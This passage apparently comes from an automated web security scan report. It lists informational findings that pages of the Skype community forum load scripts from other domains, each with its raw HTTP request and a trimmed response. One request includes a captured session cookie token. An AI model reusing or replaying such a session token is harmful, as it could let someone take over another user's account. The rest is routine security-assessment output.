GET /t5/Deutsch/ct-p/de HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:57 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 136928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.149. http://community.skype.com/t5/DiscusiĂłn-general/bd-p/es_general  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Discusi..n-general/bd-p/es_general

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Discusi..n-general/bd-p/es_general HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:21 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 193336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.150. http://community.skype.com/t5/Discussione-generale/bd-p/it_general  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Discussione-generale/bd-p/it_general

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Discussione-generale/bd-p/it_general HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:16 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 184898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.151. http://community.skype.com/t5/English/ct-p/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/English/ct-p/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/English/ct-p/English?profile.language=en HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Host: community.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:48 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=1344388383; Domain=.skype.com; Expires=Thu, 04-Sep-2014 14:36:06 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 174723
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.152. http://community.skype.com/t5/English/ct-p/English  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/English/ct-p/English

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/English/ct-p/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:23 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 172392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/7520FA85D659BF7F8D131CF0968B0690/lia-scripts-body-min.js"></script>
...[SNIP]...

18.153. http://community.skype.com/t5/Español/ct-p/es  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Espa..ol/ct-p/es

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Espa..ol/ct-p/es HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:18 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 135918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.154. http://community.skype.com/t5/Facebook/ct-p/fb_en  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Facebook/ct-p/fb_en

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Facebook/ct-p/fb_en HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 81326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.155. http://community.skype.com/t5/Formas-de-pagamento-crĂ©dito/bd-p/pt_payment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Formas-de-pagamento-cr..dito/bd-p/pt_payment

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Formas-de-pagamento-cr..dito/bd-p/pt_payment HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:13 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 180464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.156. http://community.skype.com/t5/Frequently-Asked/ct-p/Frequently_asked  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Frequently-Asked/ct-p/Frequently_asked

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Frequently-Asked/ct-p/Frequently_asked HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 128250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.157. http://community.skype.com/t5/Garage/Add-an-quot-Old-Emoticons-quot-option-please/m-p/133868  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Garage/Add-an-quot-Old-Emoticons-quot-option-please/m-p/133868

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Garage/Add-an-quot-Old-Emoticons-quot-option-please/m-p/133868 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:29 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 105310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js"></script>
...[SNIP]...

18.158. http://community.skype.com/t5/Garage/bd-p/Garage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Garage/bd-p/Garage

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Garage/bd-p/Garage HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:29 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 137085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/AA2312F60BA29D0BF8D88F1980CD8BE6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.159. http://community.skype.com/t5/General/ct-p/General_discussion  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/General/ct-p/General_discussion

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/General/ct-p/General_discussion HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:56 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 130212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.160. http://community.skype.com/t5/Hardware/Speaker-problem/m-p/134244  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Hardware/Speaker-problem/m-p/134244

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Hardware/Speaker-problem/m-p/134244 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:57 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 220394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.161. http://community.skype.com/t5/Italiano/ct-p/it  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Italiano/ct-p/it

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Italiano/ct-p/it HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:14 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 127760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.162. http://community.skype.com/t5/Language-learning/Do-you-want-to-talk-with-me/m-p/134138  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Language-learning/Do-you-want-to-talk-with-me/m-p/134138

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Language-learning/Do-you-want-to-talk-with-me/m-p/134138 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:07 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 83610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.163. http://community.skype.com/t5/Language-learning/bd-p/Languages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Language-learning/bd-p/Languages

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Language-learning/bd-p/Languages HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:06 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 204303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.164. http://community.skype.com/t5/Le-matĂ©riel-Skype/bd-p/fr_hardware  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Le-mat..riel-Skype/bd-p/fr_hardware

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Le-mat..riel-Skype/bd-p/fr_hardware HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:09 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 116420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
